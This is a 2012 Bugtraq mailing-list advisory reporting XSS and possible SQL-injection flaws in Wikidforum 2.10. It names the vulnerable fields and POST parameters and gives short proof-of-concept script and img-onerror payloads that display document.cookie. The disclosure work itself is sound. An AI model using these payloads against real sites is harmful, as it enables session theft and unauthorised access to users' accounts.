[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Wikidforum 2.10 Multiple security vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Wikidforum 2.10 Multiple security vulnerabilities
From: sschurtz@xxxxxxxxxxxxxxx
Date: Sat, 10 Mar 2012 10:13:12 GMT

Advisory:               Wikidforum 2.10 Multiple security vulnerabilities
Advisory ID:            SSCHADV2012-005
Author:                 Stefan Schurtz
Affected Software:      Successfully tested on Wikidforum 2.10
Vendor URL:             http://www.wikidforum.com/
Vendor Status:          informed

==========================
Vulnerability Description
==========================

Wikidforum 2.10 is prone to multiple XSS and SQL-Injection vulnerabilities

==================
PoC-Exploit
==================

// xss
Search-Field -> '"</script><script>alert(document.cookie)</script>
Search-Field -> Advanced Search -> Author -> 
'"</script><script>alert(document.cookie)</script>
Search-Field -> Advanced Search -> POST-Parameter 'select_sort' -> ><iMg src=N 
onerror=alert(document.cookie)>

// possible SQL-Injection

Search-Field -> Advanced Search -> POST-Parameter 'select_sort' -> 
[sql-injection]
Search-Field -> Advanced Search -> POST-Parameter 'opt_search_select' -> 
[sql-injection]

=========
Solution
=========

-

====================
Disclosure Timeline
====================

19-Feb-2012 - vendor informed
10-Mar-2012 - no response from vendor

========
Credits
========

Vulnerabilities found and advisory written by Stefan Schurtz.

===========
References
===========

http://www.darksecurity.de/advisories/2012/SSCHADV2012-005.txt

Prev by Date: Synology Photo Station 5 - Reflected Cross-Site Scripting
Next by Date: Re: Ariadne 2.7.6 Multiple XSS vulnerabilities
Previous by thread: Synology Photo Station 5 - Reflected Cross-Site Scripting
Next by thread: Re: Ariadne 2.7.6 Multiple XSS vulnerabilities
Index(es):
- Date
- Thread